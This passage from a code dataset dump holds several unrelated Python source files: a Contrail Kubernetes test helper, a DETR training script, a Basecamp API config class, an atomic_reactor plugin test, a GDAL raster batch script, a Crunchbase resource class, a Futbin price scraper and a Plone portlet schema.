ingress_ns_dict['match_labels'].update({k: v})\n ingress_ns_selector = {\n 'namespace_selector': ingress_ns_dict}\n\n from_item_dict = from_item.get('ip_block') or {}\n for k, v in from_item_dict.iteritems():\n if not ingress_ip_block_dict:\n ingress_ip_block_dict = {'cidr': \"\"}\n if k == \"cidr\":\n ingress_ip_block_dict.update({k: v})\n if k == \"_except\":\n ingress_ip_block_dict.update({k: v})\n ingress_ip_block = {\n 'ip_block': ingress_ip_block_dict}\n \n from_entries.append(ingress_pod_selector or\n ingress_ns_selector or\n ingress_ip_block)\n # end for from_item\n\n port_list = []\n for port_str in ingress_item.get('ports', {}):\n protocol, port = port_str.split('/')\n port_list.append({'protocol': protocol, 'port': int(port)})\n # end for port_str\n if len(from_entries)>0:\n ingress_item_dict = {'from': from_entries}\n if port_list:\n ingress_item_dict.update({'ports': port_list})\n ingress_list.append(ingress_item_dict)\n\n # end for ingress_item\n # end if ingress\n if egress is not None:\n egress_item_dict = {}\n for egress_item in egress:\n to_entries = []\n if egress_item == {}:\n egress_list.append({})\n break\n \n for to_item in egress_item.get('to', {}):\n egress_ip_block_dict = {}\n egress_ip_block = None\n #space\n to_item_dict = to_item.get('ip_block') or {}\n for k, v in to_item_dict.iteritems():\n if not egress_ip_block_dict:\n egress_ip_block_dict = {'cidr': \"\"}\n if k == \"cidr\":\n egress_ip_block_dict.update({k: v})\n egress_ip_block = {\n 'ip_block': egress_ip_block_dict} \n to_entries.append(egress_ip_block)\n # end for from_item\n\n port_list = []\n for port_str in egress_item.get('egress_ports', {}):\n protocol, port = port_str.split('/')\n port_list.append({'protocol': protocol, 'port': int(port)})\n # end for port_str\n if len(to_entries) > 0:\n egress_item_dict = {'to': to_entries}\n if port_list:\n egress_item_dict.update({'egress_ports': port_list})\n egress_list.append(egress_item_dict)\n # end for egress_item\n # end of egress\n \n if policy_types:\n spec['policy_types'] = policy_types\n if ingress:\n spec['ingress'] = ingress_list\n if egress:\n spec['egress'] = egress_list\n spec['pod_selector'] = pod_selector_dict\n\n if update == False:\n return self.useFixture(NetworkPolicyFixture(\n connections=self.connections,\n name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec))\n else:\n return np_fixture.update(metadata=np_fixture.metadata,\n spec=spec)\n # end setup_policy\n\n def setup_update_simple_policy(self,\n pod_selector=None,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n ingress_pods=None,\n ingress_namespaces=None,\n ingress_ipblock=None,\n egress_ipblock=None,\n ingress_all = False,\n egress_all = False,\n policy_types=None,\n ports=None,\n egress_ports=None,\n update = False,\n np_fixture = None):\n '''\n A simple helper method to create a network policy with a single\n ingress entry and a single from condition\n Ex :\n ingress_pod : { 'role': 'frontend'}\n ingress_namespace : { 'project': 'mynamespace'}\n ingress_ipblock : { \"cidr\" : \"10.204.217.0/24\", \"_except\" : [\"10.204.217.4/30\"] }\n egress_ipblock : { \"cidr\" : \"10.204.217.0/24\"}\n ports = ['tcp/80']\n egress_ports = ['tcp/80']\n policy_types = [\"Ingress\"] or [\"Egress\"]\n\n '''\n metadata = metadata or {}\n spec = spec or {}\n ingress_pods = ingress_pods\n ingress_namespaces = ingress_namespaces\n ingress_ipblock = ingress_ipblock\n ports = ports\n egress_ports = egress_ports\n ingress_pod_selector = None\n ns_selector = None\n 
ingress_ipblock_selector = None\n egress_ipblock_selector = None\n port_list = []\n egress_port_list = []\n name = name or get_random_name('np-')\n metadata.update({'name': name})\n selector_dict = {}\n pod_selector_dict = {}\n policy_types = policy_types\n\n if pod_selector is not None:\n pod_selector_dict = {'match_labels': pod_selector}\n\n if ingress_pods is not None:\n ingress_pod_dict = {'match_labels': {}}\n for k, v in ingress_pods.iteritems():\n ingress_pod_dict['match_labels'].update({k: v})\n ingress_pod_selector = {'pod_selector': ingress_pod_dict}\n\n if ingress_namespaces is not None:\n ingress_ns_dict = {'match_labels': {}}\n for k, v in ingress_namespaces.iteritems():\n ingress_ns_dict['match_labels'].update({k: v})\n ns_selector = {'namespace_selector': ingress_ns_dict}\n\n if ingress_ipblock is not None:\n ingress_ipblock_selector = {'ip_block': ingress_ipblock}\n\n if egress_ipblock is not None:\n egress_ipblock_selector = {'ip_block': egress_ipblock}\n\n if ports is not None:\n for port_str in ports:\n protocol, port = port_str.split('/')\n port_list.append({'protocol': protocol, 'port': int(port)})\n \n if egress_ports is not None:\n for port_str in egress_ports:\n protocol, port = port_str.split('/')\n egress_port_list.append({'protocol': protocol, 'port': int(port)})\n\n if ingress_all == True:\n spec.update({\n 'ingress': [{}]\n })\n elif ingress_pod_selector or ns_selector or ingress_ipblock_selector:\n spec.update({\n 'ingress': [\n {'from': [ingress_pod_selector or ns_selector or ingress_ipblock_selector],\n }\n ]\n })\n elif egress_all == True:\n spec.update({\n 'egress': [{}]\n })\n elif egress_ipblock_selector:\n spec.update({\n 'egress': [\n {'to': [egress_ipblock_selector],\n }\n ]\n })\n #space\n spec.update({'pod_selector': pod_selector_dict})\n if ports is not None and (policy_types == [\"Ingress\"] or policy_types == [] ):\n spec['ingress'][0]['ports'] = port_list\n if egress_ports is not None and policy_types == [\"Egress\"]:\n spec['egress'][0]['egress_ports'] = egress_port_list\n if policy_types:\n spec[\"policy_types\"] = policy_types\n #space\n if update == False:\n return self.useFixture(NetworkPolicyFixture(\n connections=self.connections,\n name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec))\n else:\n return np_fixture.update(metadata=np_fixture.metadata,\n spec=spec)\n # end setup_simple_policy\n\n def setup_isolation(self, namespace_fixture):\n namespace_fixture.enable_isolation()\n self.addCleanup(namespace_fixture.disable_isolation)\n # end self.setup_isolation\n\n def setup_deployment(self,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n min_ready_seconds=None,\n paused=None,\n progress_deadline_seconds=None,\n replicas=None,\n revision_history_limit=None,\n rollback_to=None,\n strategy=None,\n template=None):\n '''\n A helper method to create a deployment\n\n Ref https://github.com/kubernetes-incubator/client-python/blob/master/kubernetes/docs/AppsV1beta1DeploymentSpec.md\n\n '''\n metadata = metadata or {}\n spec = spec or {}\n name = name or get_random_name('dep-')\n metadata.update({'name': name})\n\n if min_ready_seconds:\n spec.update({'min_ready_seconds': min_ready_seconds})\n if paused:\n spec.update({'paused': paused})\n if progress_deadline_seconds:\n spec.update(\n {'progress_deadline_seconds': progress_deadline_seconds})\n if replicas:\n spec.update({'replicas': replicas})\n if revision_history_limit:\n spec.update({'revision_history_limit': revision_history_limit})\n if 
rollback_to:\n spec.update({'rollback_to': rollback_to})\n if strategy:\n spec.update({'strategy': strategy})\n if template:\n spec.update({'template': template})\n\n obj = self.useFixture(DeploymentFixture(\n connections=self.connections,\n namespace=namespace,\n metadata=metadata,\n spec=spec))\n return obj\n # end setup_deployment\n\n def setup_nginx_deployment(self,\n name=None,\n namespace='default',\n replicas=1,\n pod_labels=None,\n container_port=80,\n metadata=None,\n spec=None,\n template_metadata=None,\n template_spec=None):\n\n metadata = metadata or {}\n spec = spec or {}\n pod_labels = pod_labels or {}\n name = name or get_random_name('nginx-dep')\n template_metadata = template_metadata or {}\n\n if pod_labels:\n template_metadata['labels'] = template_metadata.get('labels', {})\n template_metadata['labels'].update(pod_labels)\n template_spec = template_spec or {\n 'containers': [\n {'image': 'nginx',\n 'ports': [\n {'container_port': int(container_port)}\n ],\n }\n ]\n }\n if replicas:\n spec.update({'replicas': replicas})\n spec.update({\n 'template': {\n 'metadata': template_metadata,\n 'spec': template_spec\n }\n })\n return self.setup_deployment(name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec)\n # end setup_nginx_deployment\n\n def restart_kube_manager(self, ips=None):\n '''\n Restarts kube-managers\n If no ips is specified, restarts all kube-managers on all nodes\n '''\n ips = ips or self.inputs.kube_manager_ips\n\n self.logger.info('Will restart contrail-kube-manager services now on'\n ' %s' %(ips))\n self.inputs.restart_service('contrail-kube-manager', ips,\n container='contrail-kube-manager',\n verify_service=False)\n # end restart_kube_manager\n\n def create_snat_router(self, name):\n\n obj = self.connections.vnc_lib_fixture.vnc_h.create_router(name=name, \n project_obj=self.connections.vnc_lib_fixture.get_project_obj())\n\n self.addCleanup(self.connections.vnc_lib_fixture.vnc_h.delete_router, obj)\n return obj \n\n def connect_vn_with_router(self, router_obj, vn_fq_name):\n\n # Configure VN name from namespace\n\n # Read VN from API\n vn_fq_name_str = ':'.join(vn_fq_name)\n vn_obj=self.vnc_lib.virtual_network_read(fq_name_str=vn_fq_name_str)\n\n # To associate VN to logical router need to create a dummy port\n vmi_id = str(uuid.uuid4())\n vmi_obj = vnc_api_test.VirtualMachineInterface(name=vmi_id,\n parent_obj=self.connections.vnc_lib_fixture.get_project_obj())\n vmi_obj.add_virtual_network(vn_obj)\n self.vnc_lib.virtual_machine_interface_create(vmi_obj)\n self.addCleanup(self.vnc_lib.virtual_machine_interface_delete, id=vmi_obj.uuid)\n\n # Connect namespace VN to router\n router_obj.add_virtual_machine_interface(vmi_obj)\n self.addCleanup(self._remove_namespace_from_router,router_obj,vmi_obj)\n\n # Update logical router object\n self.vnc_lib.logical_router_update(router_obj)\n\n return router_obj\n\n def _remove_namespace_from_router(self, router_obj, vmi_obj):\n router_obj.del_virtual_machine_interface(vmi_obj)\n # Update logical router object\n self.vnc_lib.logical_router_update(router_obj)\n \n\n def configure_snat_for_pod (self, pod):\n \n # Create logical router \n router_obj = self.create_snat_router(\"snat_router\")\n\n # Connect router with virtual network associated to pod \n self.connect_vn_with_router(router_obj, pod.vn_fq_names[0])\n \n # Configure external_gateway\n 
self.connections.vnc_lib_fixture.vnc_h.connect_gateway_with_router(router_obj,\\\n self.public_vn.public_vn_fixture.obj)\n # end configure_snat_for_pod\n\n def verify_reachability(self, source_pod, dest_pods):\n '''\n Returns (boolean, list of booleans)\n '''\n results = []\n for dest_pod in dest_pods:\n result = source_pod.ping_with_certainty(dest_pod.pod_ip)\n results.append(result)\n final_result = all(results)\n return (final_result, results)\n # end verify_reachability\n\n def setup_tls_secret(self,\n name=None,\n namespace='default',\n metadata=None,\n data=None,\n **kwargs):\n name = name or get_random_name('secret')\n metadata = metadata or {}\n data = data or {}\n metadata['name'] = metadata.get('name') or name\n return self.useFixture(TLSSecretFixture(\n connections=self.connections,\n namespace=namespace,\n metadata=metadata,\n data=data,\n **kwargs))\n # end setup_tls_secret\n \n def setup_vn(self, \n project_name = None,\n connections = None,\n inputs = None,\n vn_name = None,\n option = \"contrail\"):\n project_name = self.inputs.project_name\n connections = self.connections\n inputs = self.inputs\n vn_name = vn_name or get_random_name('vn_test')\n return self.useFixture(VNFixture(project_name=project_name,\n connections=connections,\n inputs=inputs, \n vn_name=vn_name,\n option=option))\n\n def delete_cluster_project(self):\n \"\"\"\n This method is used to enable the project isolation by deleting the \n definition of cluster_project from kubernetes.conf.\n It also returns the project it is deleting so that the same can be configured\n as part of cleanup\n \"\"\"\n cmd = 'grep \"^[ \\t]*cluster_project\" /etc/contrail/contrail-kubernetes.conf'\n cp_line = self.inputs.run_cmd_on_server(self.inputs.kube_manager_ips[0],\n cmd, container='contrail-kube-manager')\n if 'cluster_project' in cp_line:\n m = re.match('[ ]*cluster_project.*project(.*)', cp_line)\n if m:\n project = m.group(1).strip(\"'\\\": \").split(\",\")[0].strip(\"'\\\"\")\n cmd = 'sed -i \"/^cluster_project/d\" /etc/contrail/contrail-kubernetes.conf'\n for kube_manager in self.inputs.kube_manager_ips:\n self.inputs.run_cmd_on_server(kube_manager, cmd, \n container='contrail-kube-manager')\n else:\n project = None\n return project\n else:\n self.logger.warn(\"cluster_project not set. 
Hence skipping delete\")\n return\n self.restart_kube_manager()\n time.sleep(10)\n return project\n #end delete_cluster_project\n \n def add_cluster_project(self, project_name = None):\n \"\"\"\n This method is used to add cluster_project in kubernetes.conf.\n This will inturn disable project level isolation as well.\n \"\"\"\n if project_name ==None:\n self.logger.warn(\"No project to be added as cluster_project\")\n return\n cmd = 'grep \"^[ \\t]*cluster_project\" /etc/contrail/contrail-kubernetes.conf'\n cp_line = self.inputs.run_cmd_on_server(self.inputs.kube_manager_ips[0],\n cmd, container='contrail-kube-manager')\n if 'cluster_project' in cp_line:\n self.logger.warn(\"cluster_project already present in kubernetes.conf\")\n return\n cmd = r'sed -i \"/KUBERNETES/a cluster_project = {\\\\\"project\\\\\": \\\\\"%s\\\\\", \\\\\"domain\\\\\": \\\\\"default-domain\\\\\"}\" /etc/contrail/contrail-kubernetes.conf' \\\n % project_name\n for kube_manager in self.inputs.kube_manager_ips:\n self.inputs.run_cmd_on_server(kube_manager, cmd, \n container='contrail-kube-manager')\n self.restart_kube_manager()\n time.sleep(10)\n #end add_cluster_project\n\n","sub_path":"common/k8s/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":37978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"61121021","text":"import sys\nimport os\nroot_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..', '..'))\nsys.path.append(root_path)\ndefault_config_path = os.path.join(root_path, 'config', 'detr_tracking_variants', 'encoder_shared_params_decoder_cross_attn_2_resnet50_lrdrop80')\n\nimport argparse\nfrom pathlib import Path\nimport Utils.detr_misc as utils\nfrom training.detr_tracking_variants.training_loop import training_loop\nfrom training.detr_tracking_variants.encoder_shared_params_decoder_cross_attn_decoder_no_z_mask.builder import build_training_actor_and_dataloader\nfrom Utils.yaml_config import load_config\nfrom workarounds.all import apply_all_workarounds\n\n\ndef get_args_parser():\n parser = argparse.ArgumentParser('Set transformer tracker parameters', add_help=False)\n parser.add_argument('--net_config', type=str, default=os.path.join(default_config_path, 'network.yaml'), help='Path to the net config')\n parser.add_argument('--train_config', type=str, default=os.path.join(default_config_path, 'train.yaml'), help='Path to the train config')\n parser.add_argument('--train_dataset_config', type=str, default=os.path.join(default_config_path, 'dataset', 'train.yaml'), help='Path to the train dataset config')\n parser.add_argument('--val_dataset_config', type=str, default=os.path.join(default_config_path, 'dataset', 'val.yaml'), help='Path to the val dataset config')\n\n parser.add_argument('--output_dir', default='',\n help='path where to save, empty for no saving')\n parser.add_argument('--device', default='cuda',\n help='device to use for training / testing')\n parser.add_argument('--seed', default=42, type=int)\n parser.add_argument('--resume', default='', help='resume from checkpoint')\n parser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n help='start epoch')\n parser.add_argument('--num_workers', default=2, type=int)\n\n # distributed training parameters\n parser.add_argument('--world_size', default=1, type=int,\n help='number of distributed processes')\n parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training')\n return parser\n\n\ndef 
main(args):\n utils.init_distributed_mode(args)\n print(\"git:\\n {}\\n\".format(utils.get_sha()))\n\n print(args)\n\n # fix the seed for reproducibility\n seed = args.seed + utils.get_rank()\n apply_all_workarounds(seed)\n\n net_config = load_config(args.net_config)\n train_config = load_config(args.train_config)\n\n actor, train_data_loader, val_data_loader = build_training_actor_and_dataloader(args, net_config, train_config, args.train_dataset_config, args.val_dataset_config)\n training_loop(args, train_config, actor, train_data_loader, val_data_loader)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('DETR tracker training script', parents=[get_args_parser()])\n args = parser.parse_args()\n if args.output_dir:\n Path(args.output_dir).mkdir(parents=True, exist_ok=True)\n\n main(args)\n","sub_path":"entry/detr_tracking_variants/encoder_shared_params_decoder_cross_attn_resnet50_decoder_no_z_mask/train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"542853021","text":"\"\"\"\nA configuration object used by the API object. Looks for a basecamp.conf file at startup and makes it a variable\ncalled GLOBAL. If nothing is specified when you make a Basecamp API object, the GLOBAL configuration will be used.\n\nReads from INI files. Also writes back to the INI files if you use this API to obtain access or refresh tokens.\n\"\"\"\ntry:\n from ConfigParser import SafeConfigParser as ConfigParser, NoSectionError, NoOptionError\nexcept ImportError:\n from configparser import ConfigParser, NoSectionError, NoOptionError\n\nfrom datetime import datetime, timedelta\nimport logging\nimport os\nimport six\n\nfrom .exc import *\n\n\nclass BasecampConfig(object):\n DEFAULT_CONFIG_FILE_LOCATIONS = [\n \"basecamp.conf\", # current directory\n os.path.expanduser(\"~/.conf/basecamp.conf\"), # user profile directory/.conf/basecamp.conf\n \"/etc/basecamp.conf\",\n ]\n\n def __init__(self, client_id=None, client_secret=None, redirect_uri=None, user_email=None, user_pass=None,\n access_token=None, access_expires=None, refresh_token=None, filepath=None):\n self.client_id = client_id\n self.client_secret = client_secret\n self.redirect_uri = redirect_uri\n self.user_email = user_email\n self.user_pass = user_pass\n self.access_token = access_token\n self._access_expires = datetime.min\n if access_expires is not None:\n self.access_expires = access_expires\n self.refresh_token = refresh_token\n self.filepath = filepath\n\n @property\n def access_expires(self):\n return self._access_expires\n\n @access_expires.setter\n def access_expires(self, value):\n if isinstance(value, datetime):\n self._access_expires = value\n return\n\n try:\n value = float(value)\n value = datetime.now() + timedelta(seconds=value)\n except:\n raise ValueError(\"`access_expires` needs to be a float (number of seconds until expiration) \"\n \"or a datetime. Got a `%s`.\" % type(value).__name__)\n self._access_expires = value\n\n def read(self, filepath):\n config = ConfigParser()\n config.read(filepath)\n attrs = [k for k in self.__dict__.keys() if k not in ('filepath', '_access_expires')]\n attrs.append('access_expires')\n for key in attrs:\n try:\n value = config.get('BASECAMP', key)\n if key == \"access_expires\":\n value = datetime.utcfromtimestamp(float(value))\n setattr(self, key, value)\n except NoOptionError:\n pass\n self.filepath = filepath\n\n def save(self, filepath=None):\n if filepath is None:\n filepath = self.filepath\n if filepath is not None:\n try:\n os.makedirs(os.path.dirname(filepath), mode=0o770)\n except OSError:\n pass # folder probably already exists\n \n config = ConfigParser()\n config.add_section('BASECAMP')\n attrs = [k for k in self.__dict__.keys() if k != 'filepath']\n for key in attrs:\n try:\n value = getattr(self, key)\n if value is None:\n continue\n if key == \"_access_expires\":\n key = \"access_expires\"\n try:\n value = value.timestamp()\n except:\n continue # if timestamp is at min value, this will fail, that's ok\n \n config.set('BASECAMP', key, six.text_type(value))\n setattr(self, key, value)\n except (NoSectionError, NoOptionError):\n pass\n with open(filepath, \"w\") as fileout:\n config.write(fileout)\n self.filepath = filepath\n\n @classmethod\n def from_filepath(cls, filepath):\n if not os.path.exists(filepath):\n raise IOError(\"Non-existent configuration file '%s'\" % filepath)\n new_config = cls()\n new_config.read(filepath)\n return new_config\n\n @classmethod\n def load_from_default_paths(cls):\n for config_file in cls.DEFAULT_CONFIG_FILE_LOCATIONS:\n try:\n return cls.from_filepath(config_file)\n except Exception as ex:\n logging.debug(\"%s: %s is missing or invalid.\", type(ex).__name__, config_file)\n else:\n raise NoDefaultConfigurationFound()\n","sub_path":"basecampy3/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"609998343","text":"\"\"\"\nCopyright (c) 2015 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals\nimport os\nimport json\n\nfrom atomic_reactor.plugins.input_osv3 import OSv3InputPlugin\n\nimport pytest\nfrom flexmock import flexmock\n\n@pytest.mark.parametrize('prebuild_json,expected_json', [\n ([],\n [{ 'name': 'pull_base_image' }]\n ),\n ([{ 'name': 'pull_base_image' }],\n [{ 'name': 'pull_base_image' }]\n ),\n ([{ 'name': 'pull_base_image', 'args': { 'a': 'b' }}],\n [{ 'name': 'pull_base_image', 'args': { 'a': 'b' }}]\n ),\n ([{ 'name': 'change_source_registry' }],\n [{ 'name': 'pull_base_image' }]\n ),\n ([{ 'name': 'change_source_registry',\n 'args': { 'registry_uri': 'localhost:666', 'insecure_registry': True }}],\n [{ 'name': 'pull_base_image',\n 'args': { 'parent_registry': 'localhost:666', 'parent_registry_insecure': True }}]\n ),\n ([{ 'name': 'change_source_registry' }, { 'name': 'pull_base_image', 'args': { 'a': 'b' }}],\n [{ 'name': 'pull_base_image', 'args': { 'a': 'b' }}]\n ),\n])\ndef test_prebuild_plugins_rewrite(prebuild_json, expected_json):\n plugins_json = {\n 'prebuild_plugins': prebuild_json,\n }\n\n mock_env = {\n 'BUILD': '\"UNUSED\"',\n 'SOURCE_URI': 'https://github.com/foo/bar.git',\n 'SOURCE_REF': 'master',\n 'OUTPUT_IMAGE': 'asdf:fdsa',\n 'OUTPUT_REGISTRY': 'localhost:5000',\n 'DOCK_PLUGINS': json.dumps(plugins_json),\n }\n flexmock(os, environ=mock_env)\n\n plugin = OSv3InputPlugin()\n assert plugin.run()['prebuild_plugins'] == expected_json\n","sub_path":"tests/plugins/test_input_osv3.py","file_name":"test_input_osv3.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"133785543","text":"import os\nimport os\nimport sys\nimport datetime\nimport time\nfrom google.cloud import storage\ntry:\n from progress.bar import IncrementalBar\nexcept ImportError:\n pass\n\ncalc_factor = 0.85\n\ntarget_dir = '~/Google Drive/California_Land_IQ_Boundaries/Land_IQ_CDL_hybrid_land_use'\ntarget_dir = os.path.expanduser(target_dir)\noutput_dir = os.path.join(target_dir, 'modified')\noutput_dir = os.path.expanduser(output_dir)\n\n\n\ndef main():\n # print(\"Main\")\n # print(folder)\n\n if not os.path.exists(output_dir):\n print(\"Creating output directory: \\n{}\\n\".format(output_dir))\n os.makedirs(output_dir)\n\n ###Create list of files in dir\n # raster\n raster_list = os.listdir(target_dir)\n # bar = IncrementalBar('Rasters', max=len(raster_list))\n\n for raster in raster_list:\n # if raster.endswith(\".tif\"):\n if raster.endswith(\".img\"):\n\n raster_path = os.path.join(target_dir, raster)\n output_path = os.path.join(output_dir, raster)\n\n print(raster)\n # print(raster_path)\n # print(output_path)\n # os.sys.exit()\n\n # bar.next()\n # print(dir_content)\n # merge_list.append(os.path.join(sub_dir_path, dir_content))\n\n ###gdal_calc.py command\n ratio_command = r'gdal_calc.py -A {} --outfile={} --calc=A*{}'.format(raster_path, output_path, calc_factor)\n replace_command = r'gdal_calc.py -A {} --outfile={} --calc=(A*(A!=62))+(176*(A=62))'.format(raster_path, output_path,\n calc_factor)\n calc_command = replace_command\n os.system(calc_command)\n time.sleep(30)\n\n\n\n # bar.finish()\n\n\n\n\n ### Copy all contents of bucket to dir\n # gsutil -m cp -r gs://openet_geodatabase/field_boundaries_shapefiles_staged /Users/mbromley/field_boundaries_shapefiles_staged/\n\n ### Iterate through all states\n # if 'progress' in sys.modules:\n # bar = IncrementalBar('States', max = len(states))\n # for state in states:\n # bar.next()\n # # time.sleep(0.1)\n #\n # ### Command line argument\n # os.system(\"echo Processing {}!\".format(state))\n # bar.finish()\n\n # os.system(\"gsutil -m cp -r gs://{} {}\".format(Gbucket, folder))\n\nif __name__ == \"__main__\":\n main()","sub_path":"OpenET-Personal_Tools/Bulk_gdal_calc/Bulk_gdal_calc_replace_value.py","file_name":"Bulk_gdal_calc_replace_value.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"374334044","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /usr/local/lib/python2.7/site-packages/pycrunchbase/resource/fundinground.py\n# Compiled at: 2017-01-13 23:45:16\nimport six\nfrom .node import Node\nfrom .utils import parse_date\n\n@six.python_2_unicode_compatible\nclass FundingRound(Node):\n \"\"\"Represents a FundingRound on CrunchBase\"\"\"\n KNOWN_PROPERTIES = [\n 'permalink',\n 'api_path',\n 'web_path',\n 'funding_type',\n 'series',\n 'series_qualifier',\n 'announced_on',\n 'announced_on_trust_code',\n 'closed_on',\n 'closed_on_trust_code',\n 'money_raised',\n 'money_raised_currency_code',\n 'money_raised_usd',\n 'target_money_raised',\n 'target_money_raised_currency_code',\n 'target_money_raised_usd',\n 'created_at',\n 'updated_at']\n KNOWN_RELATIONSHIPS = [\n 'investments',\n 'funded_organization',\n 'images',\n 'videos',\n 'news']\n\n def _coerce_values(self):\n for attr in ['announced_on']:\n if getattr(self, attr, None):\n setattr(self, attr, parse_date(getattr(self, attr)))\n\n return\n\n def __str__(self):\n return ('{funding_type} ${money} on {announced} by {investments}').format(funding_type=self.funding_type, money=self.money_raised_usd, announced=self.announced_on, investments=self.investments)\n\n def __repr__(self):\n return self.__str__()","sub_path":"pycfiles/pycrusher-0.3.8.tar/fundinground.py","file_name":"fundinground.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"384330356","text":"from bs4 import BeautifulSoup\nimport aiohttp\n\n\nasync def fetch(session, url):\n async with session.get(url) as response:\n\n return await response.text()\n\n\nasync def fetch_json(session, url):\n async with session.get(url) as response:\n return await response.json()\n\n\nasync def check_price_by_id(data_tuple):\n player_id = data_tuple[0]\n url = \"https://www.futbin.com/19/player/\" + player_id\n async with aiohttp.ClientSession() as session:\n web_page = await fetch(session, url)\n soup = BeautifulSoup(web_page, 'html.parser')\n price_id = str(soup.find(id=\"page-info\")).split('data-player-resource=\"')[1].partition('\"')[0]\n url = \"https://www.futbin.com/19/playerPrices?player=\" + price_id\n async with aiohttp.ClientSession() as session:\n web_page = await fetch(session, url)\n price_string = str(web_page)\n player_price = price_string.split('\"ps\":{\"LCPrice\":\"')[1].partition('\"')[0]\n return player_price, data_tuple[1], data_tuple[2]\n\n\nasync def get_player_id_by_name_and_rating(name, rating, version=\"Normal\"):\n url = \"https://www.futbin.com/search?year=19&term=\" + str(name)\n async with aiohttp.ClientSession() as session:\n web_page = await fetch_json(session, url)\n list_of_players_raw_data = web_page\n list_of_parsed_players = []\n for x in 
list_of_players_raw_data:\n temp_dict = dict()\n temp_dict[\"name\"] = x[\"name\"]\n temp_dict[\"rating\"] = x[\"rating\"]\n temp_dict[\"id\"] = x[\"id\"]\n temp_dict[\"full_name\"] = x[\"full_name\"]\n temp_dict[\"version\"] = x[\"version\"]\n list_of_parsed_players.append(temp_dict)\n for x in list_of_parsed_players:\n if not(version == \"Normal\"):\n if x[\"rating\"] == rating and x[\"version\"] == version:\n return x[\"id\"], x[\"name\"], x[\"rating\"]\n else:\n if x[\"rating\"] == rating:\n return x[\"id\"], x[\"name\"], x[\"rating\"]\n return \"FAILED\"\n","sub_path":"asynchronous_price_check.py","file_name":"asynchronous_price_check.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522648902","text":"from zope.interface import implements\nfrom AccessControl import getSecurityManager\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom plone.app.portlets.portlets import base\n#from plone.portlet.collection.collection import Renderer as baseRenderer\nfrom zope.component import getMultiAdapter\nfrom Acquisition import aq_inner\n\nfrom zope import schema\nfrom zope.formlib import form\nfrom plone.memoize.instance import memoize\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\nfrom plone.portlet.collection import PloneMessageFactory as _a\nfrom my315ok.portlet.rollitems import RollPortletMessageFactory as _\n\n##class ICollectionPortlet(IPortletDataProvider):\nclass IRollPortlet(IPortletDataProvider):\n \"\"\"A portlet which renders the results of a collection object.\n \"\"\"\n\n header = schema.TextLine(title=_a(u\"Portlet header\"),\n description=_a(u\"Title of the rendered portlet\"),\n required=True)\n ajaxsrc = schema.TextLine(title=_(u\"target URI\"),\n description=_(u\"the URI of the resouce images view\"),\n required=True)\t\t\t\t \n show_more = schema.Bool(title=_a(u\"Show more... link\"),\n description=_a(u\"If enabled, a more... link will appear in the footer of the portlet, \"\n \"linking to the underlying Collection.\"),\n required=True,\n default=True)\n show_text = schema.Bool(title=_a(u\"Show text\"),\n description=_a(u\"If enabled, will display text description under image .\"),\n required=True,\n default=False)\n topid = schema.TextLine(title=_a(u\"top id\"),\n description=_a(u\"the wraped top id of the roll zone\"),\n required=True)\n cssid = schema.TextLine(title=_a(u\"css id\"),\n description=_a(u\"the css id of the roll zone\"),\n required=True)\n roll_direc = schema.Choice(\n title=_(u\"direction\"),\n description=_(u\"Choose the roll direction\"),\n vocabulary = 'rollitems.RollDirectionVocabulary' )\n \n speed = schema.Int(title=_(u\"speed\"),\n description=_(u\"Specify the speed of the roll items \"), \n required=True)\n pause = schema.Int(title=_(u\"pause time\"),\n description=_(u\"Specify the time of pause(ms)\"),\n required=True)\n step = schema.Int(title=_(u\"step length\"),\n description=_(u\"Specify the step length of every move.\"),\n required=True)\n\nclass Assignment(base.Assignment):\n \"\"\"\n Portlet assignment. 
